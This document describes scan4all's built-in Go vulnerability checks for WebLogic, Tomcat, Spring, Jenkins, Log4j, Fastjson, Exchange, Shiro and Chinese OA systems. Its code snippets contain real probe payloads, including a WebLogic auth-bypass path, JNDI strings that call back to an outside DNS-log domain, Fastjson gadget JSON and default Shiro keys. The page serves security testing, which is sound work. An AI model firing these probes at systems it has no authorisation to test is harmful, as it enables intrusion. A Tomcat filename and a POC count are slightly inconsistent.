## Overview

scan4all includes native Go POC modules for detecting critical vulnerabilities in enterprise applications. These POCs are compiled into the binary for maximum performance and reliability.

- **High Performance**: native Go code executes faster than interpreted templates
- **Critical CVEs**: focus on high-impact vulnerabilities requiring immediate attention
- **Enterprise Targets**: Weblogic, Jenkins, Exchange, VMware, and more
- **Custom Logic**: complex detection logic that is not possible in YAML
## Supported Systems

### Enterprise Middleware

- Oracle Weblogic
- Apache Tomcat
- Spring Framework
- Jenkins
#### Weblogic Vulnerabilities (11 POCs)

| CVE | Severity | Description |
| --- | --- | --- |
| CVE-2014-4210 | Medium | SSRF vulnerability |
| CVE-2017-3506 | Critical | WLS-WSAT RCE |
| CVE-2017-10271 | Critical | WLS-WSAT deserialization RCE |
| CVE-2018-2894 | High | Arbitrary file upload |
| CVE-2019-2725 | Critical | WLS9-ASYNC deserialization RCE |
| CVE-2019-2729 | Critical | WLS9-ASYNC deserialization RCE |
| CVE-2020-2883 | Critical | IIOP/T3 deserialization RCE |
| CVE-2020-14882 | Critical | Console authentication bypass |
| CVE-2020-14883 | Critical | Console RCE |
| CVE-2021-2109 | High | Unauthorized JNDI access |

Example check (CVE-2020-14882):

```go
func CVE_2020_14882(url string) bool {
	// Request the console portal through the double-encoded path; an unauthenticated
	// 200 whose body links to the dashboard means the authentication bypass succeeded
	path := "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a"
	if req, err := util.HttpRequset(url+path, "GET", "", false, nil); err == nil {
		if req.StatusCode == 200 && util.StrContains(req.Body, "/console/dashboard") {
			util.SendLog(req.RequestUrl, "CVE-2020-14882", "Found vuln Weblogic", "")
			return true
		}
	}
	return false
}
```
#### Tomcat Vulnerabilities (3 POCs)

| CVE | Type | Impact |
| --- | --- | --- |
| CVE-2017-12615 | File Upload | PUT method arbitrary file upload |
| CVE-2020-1938 | File Read | AJP protocol arbitrary file read (Ghostcat) |
| CVE-2020-13935 | Auth Bypass | WebSocket authentication bypass |

Affected versions:

- CVE-2017-12615: 7.0.0 - 7.0.81
- CVE-2020-1938: 6.x, 7.x < 7.0.100, 8.x < 8.5.51, 9.x < 9.0.31

Example check (CVE-2017-12615):

```go
func CVE_2017_12615(szUrl string) bool {
	// Attempt to PUT a small text file; a 201 or 204 means the server accepted the write
	if req, err := util.HttpRequset(szUrl+"/vtset.txt", "PUT", "test", false, nil); err == nil {
		if req.StatusCode == 204 || req.StatusCode == 201 {
			util.POClog(fmt.Sprintf("Found vuln Tomcat CVE_2017_12615|-- \"%s/vtest.txt\"\n", szUrl))
			return true
		}
	}
	return false
}
```
#### Spring Vulnerabilities (2 POCs)

| CVE | Name | Description |
| --- | --- | --- |
| CVE-2022-22965 | Spring4Shell | RCE via Data Binding on JDK 9+ |
| CVE-2022-22947 | Spring Gateway | Spring Cloud Gateway 3.x RCE |

Spring4Shell detection:

```go
func CVE_2022_22965(u string) bool {
	if oU, err := url.Parse(u); nil == err && oU.Host != "" {
		szUrl := oU.Scheme + "://" + oU.Host
		// Test pattern 1: classLoader array access; a vulnerable binder answers 500
		if req, err := util.HttpRequset(szUrl+"?class.module.classLoader%5b1%5d=1", "GET", "", false, nil); err == nil {
			if req.StatusCode == 500 {
				// Confirm with normal access: the same endpoint must answer 200 without the indexed parameter
				if req2, err := util.HttpRequset(szUrl+"?class.module.classLoader=1", "GET", "", false, nil); err == nil {
					if req2.StatusCode == 200 {
						return true
					}
				}
			}
		}
	}
	return false
}
```
#### Jenkins Vulnerabilities (4 POCs)

| CVE | Type | Description |
| --- | --- | --- |
| Unauthorized | RCE | Unauthorized Groovy script execution |
| CVE-2018-1000110 | Info Leak | User search information disclosure |
| CVE-2018-1000861 | RCE | Remote code execution ≤ 2.153 |
| CVE-2019-1003000 | RCE | Groovy script security bypass |

Unauthorized Groovy script check:

```go
func Unauthorized(url string) bool {
	// A harmless println posted to the script console; if its output is echoed back,
	// the console is reachable without authentication
	payload := `println("vulnerable")`
	if req, err := util.HttpRequset(url+"/script", "POST", "script="+payload, false, nil); err == nil {
		if req.StatusCode == 200 && strings.Contains(req.Body, "vulnerable") {
			return true
		}
	}
	return false
}
```
## POC Directory Structure

```text
pocs_go/
├── Springboot/              # Spring framework POCs
│   ├── CVE-2022-22965.go
│   └── CVE-2022-22947.go
├── apache/                  # Apache software POCs
│   ├── CVE-2020-13935.go
│   └── poc-go-zookeeper-unauth.go
├── confluence/              # Atlassian Confluence
│   ├── CVE_2021_26084.go
│   ├── CVE-2021-26085.go
│   ├── CVE_2022_26134.go
│   └── CVE_2022_26138.go
├── f5/                      # F5 BIG-IP
│   ├── CVE_2020_5902.go
│   ├── CVE_2021_22986.go
│   └── CVE_2022_1388.go
├── fastjson/                # Fastjson RCE
│   ├── check.go
│   └── payloads.go
├── gitlab/                  # GitLab
│   └── CVE_2021_22205.go
├── jboss/                   # JBoss
│   └── CVE_2017_12149.go
├── jenkins/                 # Jenkins CI
│   ├── Unauthorized.go
│   ├── CVE_2018_1000110.go
│   ├── CVE_2018_1000861.go
│   └── CVE_2019_10003000.go
├── log4j/                   # Log4Shell
│   ├── check.go
│   └── payloads.go
├── ms/                      # Microsoft products
│   ├── exchange/            # Exchange Server
│   ├── CVE_2021_26855.go
│   ├── CVE_2018_14847.go    (MikroTik)
│   └── CVE-2020-0796.go     (SMBGhost)
├── phpunit/                 # PHPUnit
│   └── CVE_2017_9841.go
├── shiro/                   # Apache Shiro
│   ├── CVE_2016_4437.go
│   └── dicts/               # Key dictionaries
├── seeyon/                  # Seeyon OA (10 POCs)
├── ThinkPHP/                # ThinkPHP
│   └── check.go
├── tomcat/                  # Apache Tomcat
│   ├── CVE_2017_12615.go
│   └── CVE_2020_1938.go
├── VMware/                  # VMware products
│   └── vCenter/
├── weblogic/                # Oracle Weblogic (11 POCs)
└── go_poc_check.go          # Main dispatcher
```
## Detection Workflow

### Execution Logic

```go
func POCcheck(wappalyzertechnologies []string, URL string, finalURL string, checklog4j bool) []string {
	var technologies []string
	for tech := range wappalyzertechnologies {
		// Fingerprint names are lower-cased before matching
		caseStr := strings.ToLower(wappalyzertechnologies[tech])
		switch caseStr {
		case "apache tomcat":
			// HOST is the target's host:port, set elsewhere in the dispatcher (not shown here)
			if tomcat.CVE_2020_1938(HOST) {
				technologies = append(technologies, "exp-Tomcat|CVE-2020-1938")
			}
			if tomcat.CVE_2017_12615(URL) {
				technologies = append(technologies, "exp-Tomcat|CVE-2017-12615")
			}
		case "weblogic":
			if weblogic.CVE_2020_14882(URL) {
				technologies = append(technologies, "exp-Weblogic|CVE_2020_14882")
			}
			// ... more checks
		case "shiro":
			key := shiro.CVE_2016_4437(finalURL)
			if key != "" {
				technologies = append(technologies, fmt.Sprintf("exp-Shiro|key: %s", key))
			}
		}
	}
	return technologies
}
```
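The switch above hard-codes one `case` per technology. A table-driven dispatcher that runs every check registered for each detected fingerprint concurrently (the "multiple POCs run in parallel per target" behaviour described under Performance on this page) can look like the following. This is an added example, not scan4all's own `go_poc_check.go`: `Check`, `Registry`, `Dispatch` and the stand-in checks in `DemoRegistry` are names chosen for the illustration, and the stand-ins make no network requests; they "fire" only for a constructed lab hostname.

```go
package main

import (
	"fmt"
	"sort"
	"strings"
	"sync"
)

// Check is one POC module: it probes url and reports whether the vulnerability
// indicator matched. The project's modules (tomcat.CVE_2020_1938,
// weblogic.CVE_2020_14882, ...) have this shape.
type Check struct {
	Name string // label emitted on a hit, e.g. "exp-Tomcat|CVE-2020-1938"
	Run  func(url string) bool
}

// Registry maps a lower-cased fingerprint name to the checks that apply to it
// (a table-driven replacement for the switch in POCcheck).
type Registry map[string][]Check

// Dispatch runs every check registered for every detected technology
// concurrently and returns the labels that fired. Fingerprints are matched
// case-insensitively and duplicates are skipped so a target is probed once per
// technology. The result is sorted so output is deterministic regardless of
// goroutine scheduling.
func Dispatch(reg Registry, technologies []string, url string) []string {
	var (
		wg      sync.WaitGroup
		mu      sync.Mutex
		results []string
	)
	seen := make(map[string]bool)
	for _, tech := range technologies {
		key := strings.ToLower(strings.TrimSpace(tech))
		if seen[key] {
			continue
		}
		seen[key] = true
		for _, chk := range reg[key] {
			wg.Add(1)
			go func(c Check) {
				defer wg.Done()
				if c.Run(url) {
					mu.Lock()
					results = append(results, c.Name)
					mu.Unlock()
				}
			}(chk)
		}
	}
	wg.Wait()
	sort.Strings(results)
	return results
}

// DemoRegistry wires stand-in checks (constructed, no network traffic) that
// report a hit only for the constructed hostname "lab.internal", so the
// dispatcher can be exercised offline.
func DemoRegistry() Registry {
	lab := func(url string) bool { return strings.Contains(url, "lab.internal") }
	never := func(string) bool { return false }
	return Registry{
		"apache tomcat": {
			{Name: "exp-Tomcat|CVE-2020-1938", Run: lab},
			{Name: "exp-Tomcat|CVE-2017-12615", Run: never},
		},
		"weblogic": {
			{Name: "exp-Weblogic|CVE_2020_14882", Run: lab},
		},
	}
}

func main() {
	reg := DemoRegistry()
	// Mixed-case and duplicate fingerprints are normalised and deduplicated
	fmt.Println(Dispatch(reg, []string{"Apache Tomcat", "WebLogic", "apache tomcat"}, "http://lab.internal:8080"))
	fmt.Println(Dispatch(reg, []string{"Apache Tomcat"}, "http://prod.example"))
}
```

Registering a new module becomes an entry in the table rather than a new `case`, and because each check runs in its own goroutine a slow probe against one technology no longer delays the others for the same target.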
### Flow Diagram
## Special Detection Categories

### Log4j

Comprehensive Log4j JNDI injection detection.

Features:

- Multiple payload variations
- Header injection testing (X-Forwarded-For, User-Agent, etc.)
- POST parameter injection
- Struts2 specific patterns
- DNS callback verification

Injection points:

```go
headers := map[string]string{
	"User-Agent":      payload,
	"X-Api-Version":   payload,
	"X-Forwarded-For": payload,
	"X-Client-IP":     payload,
	"X-Remote-IP":     payload,
	"X-Real-IP":       payload,
	"Referer":         payload,
	"Cookie":          "JSESSIONID=" + payload,
	"Contact":         payload,
	"Token":           payload,
}
```

Callback detection:

```go
// Each probe carries a unique subdomain of the configured DNS-log domain; a lookup
// of that name proves the target evaluated the JNDI string
uri := randomstr + "." + host + "." + util.CeyeDomain
payload := "${jndi:ldap://" + uri + "}"
// Send payloads...
if util.Dnslogchek(randomstr) {
	util.SendLog(finalURL, "log4j", "Found vuln Log4J JNDI RCE", "")
	return true
}
```
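Seen from the receiving side, the probes above are requests whose headers or query string carry a `${jndi:...}` lookup, which is also what a server operator should be hunting for in access logs. The following is an added example (not scan4all code) that scans web-server log lines in Apache/nginx combined format for such lookups, checking a percent-decoded copy of each field so an encoded probe in the query string is not missed. `ScanLog`, `Finding`, `SampleLog` and the `callback.example.invalid` domain are constructed for this illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// jndiPattern matches a Log4j lookup prefix such as "${jndi:" regardless of
// scheme (ldap, rmi, dns, ...) or letter case.
var jndiPattern = regexp.MustCompile(`(?i)\$\{\s*jndi\s*:`)

// Finding records which field of which line carried a JNDI lookup.
type Finding struct {
	Line  int
	Field string
	Value string
}

type field struct{ name, value string }

// fieldsOf splits one combined-format log line into its three quoted fields:
// request line, Referer and User-Agent. Headers such as X-Forwarded-For or
// Cookie are not in this format; log them explicitly (custom log format,
// reverse proxy or WAF) to cover those injection points as well.
func fieldsOf(line string) []field {
	parts := strings.Split(line, `"`)
	names := []string{"request", "referer", "user-agent"}
	var out []field
	for i, name := range names {
		if idx := 2*i + 1; idx < len(parts) {
			out = append(out, field{name, parts[idx]})
		}
	}
	return out
}

// ScanLog returns one finding per field that contains a JNDI lookup, checking
// both the raw value and a percent-decoded copy. Findings are in line order.
func ScanLog(log string) []Finding {
	var findings []Finding
	for n, line := range strings.Split(strings.TrimSpace(log), "\n") {
		for _, f := range fieldsOf(line) {
			decoded, err := url.QueryUnescape(f.value)
			if err != nil {
				decoded = f.value // malformed escapes: fall back to the raw text
			}
			if jndiPattern.MatchString(f.value) || jndiPattern.MatchString(decoded) {
				findings = append(findings, Finding{Line: n + 1, Field: f.name, Value: f.value})
			}
		}
	}
	return findings
}

// SampleLog is constructed test data in combined log format: one benign request
// followed by three probes (User-Agent, URL-encoded query string, Referer).
const SampleLog = `10.0.0.5 - - [10/Dec/2021:10:15:32 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Dec/2021:10:15:40 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://abc123.callback.example.invalid/a}"
10.0.0.9 - - [10/Dec/2021:10:15:41 +0000] "GET /?x=%24%7Bjndi%3Aldap%3A%2F%2Fabc123.callback.example.invalid%2Fa%7D HTTP/1.1" 200 512 "-" "curl/7.79"
10.0.0.9 - - [10/Dec/2021:10:15:42 +0000] "GET /login HTTP/1.1" 200 512 "${JNDI:rmi://abc123.callback.example.invalid/b}" "Mozilla/5.0"`

func main() {
	for _, f := range ScanLog(SampleLog) {
		fmt.Printf("line %d: JNDI lookup in %s: %s\n", f.Line, f.Field, f.Value)
	}
}
```

A hit in the log only shows that a probe arrived; whether the application resolved the lookup is answered by outbound DNS or LDAP traffic from the host, which is the same signal the scanner's DNS callback relies on.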
### Fastjson

Multiple Fastjson versions and bypass techniques.

Detected versions:

- 1.2.24 and earlier
- 1.2.47 and earlier
- 1.2.62 and earlier
- 1.2.66 and earlier

Payloads:

```go
payloads := []string{
	`{"@type":"java.net.Inet4Address","val":"` + dnslog + `"}`,
	`{"@type":"java.net.Inet6Address","val":"` + dnslog + `"}`,
	`{"@type":"java.net.InetSocketAddress"...}`,
	`{"@type":"com.sun.rowset.JdbcRowSetImpl"...}`,
}
```
### Exchange

ProxyLogon/ProxyShell detection. CVE-2021-26855 (ProxyLogon):

```go
func CheckCVE_2021_26855(host string) string {
	url := "https://" + host + "/owa/auth/x.js"
	headers := map[string]string{
		"Cookie": "X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3;",
	}
	if req, err := util.HttpRequset(url, "GET", "", false, headers); err == nil {
		if req.StatusCode == 200 {
			return "Found CVE-2021-26855 ProxyLogon"
		}
	}
	return ""
}
```
### Shiro

Shiro deserialization with key detection.

Key dictionary:

```go
// Built-in key dictionary in shiro/dicts/
keys := []string{
	"kPH+bIxk5D2deZiIxcaaaA==",
	"4AvVhmFLUs0KTA3Kprsdag==",
	"Z3VucwAAAAAAAAAAAAAAAA==",
	// ... 100+ keys
}
```

Detection:

```go
// Each known key is tried in turn; the first key whose rememberMe cookie the
// server accepts is returned, since it identifies which default key is in use
func CVE_2016_4437(url string) string {
	for _, key := range keys {
		cookie := generateRememberMeCookie(key)
		if testShiroCookie(url, cookie) {
			return key
		}
	}
	return ""
}
```
## OA System Coverage

### Chinese OA Systems

#### Seeyon (致远OA)

10 vulnerability POCs:

| POC | Type |
| --- | --- |
| SeeyonFastjson | RCE |
| SessionUpload | File Upload |
| CNVD-2019-19299 | File Upload |
| CNVD-2020-62422 | File Read |
| CNVD-2021-01627 | SQL Injection |
| CreateMysql | SQL Injection |
| DownExcelBeanServlet | Info Leak |
| GetSessionList | Session Disclosure |
| InitDataAssess | Auth Bypass |
| ManagementStatus | Info Leak |

#### Tongda (通达OA)

3 vulnerability POCs:

- Get_user_session: user session disclosure
- File_delete: arbitrary file deletion
- File_upload: arbitrary file upload

#### Other OA

- Landray (蓝凌OA): RCE vulnerability
- Zentao (禅道): CNVD-2022-42853
- MCMS (铭飞): SQL injection
## Network Protocol Checks

SMB:

- MS17-010 detection (EternalBlue)
- SMBGhost (CVE-2020-0796)

DCOM:

- Port 135 interface enumeration
- Remote interface discovery

NetBIOS:

- NetBIOS enumeration
- Workstation information

Zookeeper unauthorized access detection:

```go
func ZookeeperUnauthority(url string) bool {
	// url is a host:port pair, not an HTTP URL
	conn, err := net.Dial("tcp", url)
	if err != nil {
		return false
	}
	defer conn.Close()
	// Bound the exchange so a silent or slow port cannot stall the scan
	conn.SetDeadline(time.Now().Add(5 * time.Second))
	// Send the four-letter "stat" command; an unauthenticated server answers with its version banner
	conn.Write([]byte("stat\n"))
	// Read response
	buf := make([]byte, 1024)
	n, _ := conn.Read(buf)
	if strings.Contains(string(buf[:n]), "Zookeeper version") {
		return true
	}
	return false
}
```
## Configuration

### Automatic Execution

Go POCs execute automatically when matching fingerprints are detected:

```bash
# No special configuration needed
./scan4all -host target.com
```

### Enable Log4j Scanning

```bash
# Log4j requires DNS callback configuration (no spaces around '=' in a shell assignment)
export ceyeapi="your-api-key"
export ceyedomain="your.ceye.io"
./scan4all -host target.com
```

### Filter by Technology

```go
// Internal fingerprint matching (simplified)
if fingerprint.Contains("Apache Tomcat") {
	// Execute Tomcat POCs
}
```
## Performance

- **Native Speed**: compiled Go code executes 10-100x faster than interpreted templates
- **Low Overhead**: minimal memory footprint and CPU usage
- **Concurrent Execution**: multiple POCs run in parallel per target
- **Early Detection**: critical vulns are detected first in the scan workflow

## Output Format

```text
http://target.com [200] [Oracle Weblogic] [exp-Weblogic|CVE_2020_14882] [http://target.com/console]
http://target.com [200] [Apache Shiro] [exp-Shiro|key:Z3VucwAAAAAAAAAAAAAAAA==] [http://target.com]
http://target.com [200] [Apache Tomcat] [exp-Tomcat|CVE-2020-1938] [http://target.com]
```

Format: `URL [Status] [Technology] [Vulnerability|Details] [Final URL]`
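Feeding this output into a ticketing or SIEM pipeline is easier once each line is split into its fields. The following is an added example (not part of scan4all) that parses the format shown above into a struct and keeps only the confirmed `exp-` findings; `Result`, `ParseLine`, `ParseOutput` and `ExploitHits` are names chosen here, and `SampleOutput` is the three example lines from this page.

```go
package main

import (
	"fmt"
	"regexp"
	"strconv"
	"strings"
)

// Result is one scan4all output line broken into fields.
type Result struct {
	URL           string
	Status        int
	Technology    string
	Vulnerability string // text before '|', e.g. "exp-Weblogic"
	Details       string // text after '|', e.g. "CVE_2020_14882" or "key:..."
	FinalURL      string
}

var bracketed = regexp.MustCompile(`\[([^\]]*)\]`)

// ParseLine parses "URL [Status] [Technology] [Vulnerability|Details] [Final URL]".
// It assumes the leading URL contains no '[' (an IPv6 literal host would need
// special handling) and rejects lines with a different number of bracketed
// fields instead of guessing their meaning.
func ParseLine(line string) (Result, error) {
	line = strings.TrimSpace(line)
	groups := bracketed.FindAllStringSubmatch(line, -1)
	if len(groups) != 4 {
		return Result{}, fmt.Errorf("expected 4 bracketed fields, found %d in %q", len(groups), line)
	}
	r := Result{URL: strings.TrimSpace(line[:strings.Index(line, "[")])}
	status, err := strconv.Atoi(strings.TrimSpace(groups[0][1]))
	if err != nil {
		return Result{}, fmt.Errorf("bad status in %q: %w", line, err)
	}
	r.Status = status
	r.Technology = strings.TrimSpace(groups[1][1])
	vuln := groups[2][1]
	if i := strings.Index(vuln, "|"); i >= 0 {
		r.Vulnerability = strings.TrimSpace(vuln[:i])
		r.Details = strings.TrimSpace(vuln[i+1:])
	} else {
		r.Vulnerability = strings.TrimSpace(vuln)
	}
	r.FinalURL = strings.TrimSpace(groups[3][1])
	return r, nil
}

// ParseOutput parses every non-empty line and stops at the first malformed one.
func ParseOutput(text string) ([]Result, error) {
	var results []Result
	for _, line := range strings.Split(text, "\n") {
		if strings.TrimSpace(line) == "" {
			continue
		}
		r, err := ParseLine(line)
		if err != nil {
			return nil, err
		}
		results = append(results, r)
	}
	return results, nil
}

// ExploitHits keeps only results whose label carries the "exp-" prefix the Go
// POC modules use, i.e. confirmed checks rather than plain fingerprints.
func ExploitHits(results []Result) []Result {
	var hits []Result
	for _, r := range results {
		if strings.HasPrefix(r.Vulnerability, "exp-") {
			hits = append(hits, r)
		}
	}
	return hits
}

// SampleOutput is the page's three example lines (constructed input; target.com is a placeholder).
const SampleOutput = `http://target.com [200] [Oracle Weblogic] [exp-Weblogic|CVE_2020_14882] [http://target.com/console]
http://target.com [200] [Apache Shiro] [exp-Shiro|key:Z3VucwAAAAAAAAAAAAAAAA==] [http://target.com]
http://target.com [200] [Apache Tomcat] [exp-Tomcat|CVE-2020-1938] [http://target.com]`

func main() {
	results, err := ParseOutput(SampleOutput)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	for _, r := range ExploitHits(results) {
		fmt.Printf("%s %s %s -> %s\n", r.URL, r.Technology, r.Vulnerability, r.Details)
	}
}
```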
## Development

See Custom POCs for detailed information on creating Go POC modules.

### Quick Example

```go
package myservice

import (
	"github.com/GhostTroops/scan4all/lib/util"
)

func CVE_XXXX_XXXXX(url string) bool {
	// Build exploit URL
	exploitPath := "/vulnerable/endpoint?param=payload"
	// Send request
	if req, err := util.HttpRequset(url+exploitPath, "GET", "", false, nil); err == nil {
		// Check for vulnerability indicators
		if req.StatusCode == 200 && util.StrContains(req.Body, "vulnerable_marker") {
			util.SendLog(url, "CVE-XXXX-XXXXX", "Vulnerability found", "")
			return true
		}
	}
	return false
}
```
## Best Practices

- **Specific Detection**: use precise vulnerability markers to avoid false positives
- **Error Handling**: always handle network errors gracefully
- **Logging**: report findings with sufficient context
- **Performance**: keep POCs fast, since they run on every matching target
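A module written in the shape of the Quick Example can be checked against these practices without touching a live system: run it against an in-process HTTP server that serves both a page carrying the marker and a generic page that merely mentions the product, and confirm it fires only on the first. The following is an added example, not a scan4all module. `checkMarker` uses `net/http` with a bounded timeout and a capped body read instead of `util.HttpRequset` so it runs stand-alone, and `newLab` and `RunLab` are constructed for the illustration; the path and marker are the placeholders from the Quick Example.

```go
package main

import (
	"context"
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"time"
)

// checkMarker is a hypothetical POC in the shape of the Quick Example: it fetches
// one path and reports a hit only when the status code and a specific body marker
// both match. Network errors are returned to the caller rather than silently
// reported as "not vulnerable", and the response body is capped so an oversized
// reply cannot stall the scan.
func checkMarker(ctx context.Context, client *http.Client, baseURL, path, marker string) (bool, error) {
	req, err := http.NewRequestWithContext(ctx, http.MethodGet, strings.TrimRight(baseURL, "/")+path, nil)
	if err != nil {
		return false, err
	}
	resp, err := client.Do(req)
	if err != nil {
		return false, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return false, err
	}
	return resp.StatusCode == http.StatusOK && strings.Contains(string(body), marker), nil
}

// newLab starts an in-process server (constructed) that imitates the two cases a
// POC must tell apart: the page carrying the marker and a generic 200 page that
// only mentions the product name, a classic false-positive trap.
func newLab() *httptest.Server {
	mux := http.NewServeMux()
	mux.HandleFunc("/vulnerable/endpoint", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "<html>... vulnerable_marker ...</html>")
	})
	mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprint(w, "<html>Welcome to Example Product 1.0</html>")
	})
	return httptest.NewServer(mux)
}

// RunLab runs checkMarker against both pages and returns
// (hit on the marker page, hit on the generic page, error).
func RunLab() (bool, bool, error) {
	srv := newLab()
	defer srv.Close()
	client := &http.Client{Timeout: 3 * time.Second}
	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
	defer cancel()
	hit, err := checkMarker(ctx, client, srv.URL, "/vulnerable/endpoint?param=payload", "vulnerable_marker")
	if err != nil {
		return false, false, err
	}
	miss, err := checkMarker(ctx, client, srv.URL, "/other?param=payload", "vulnerable_marker")
	if err != nil {
		return false, false, err
	}
	return hit, miss, nil
}

func main() {
	hit, miss, err := RunLab()
	fmt.Println(hit, miss, err) // true false <nil>
}
```

The same harness doubles as a regression test for the module: keep the lab handlers next to the POC and the marker check cannot quietly drift into matching the product banner alone.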
Related pages:

- **Custom POCs**: learn to develop your own Go POC modules
- **Xray POCs**: YAML-based POC system
- **Fingerprinting**: technology detection system
- **Development Guide**: extend scan4all capabilities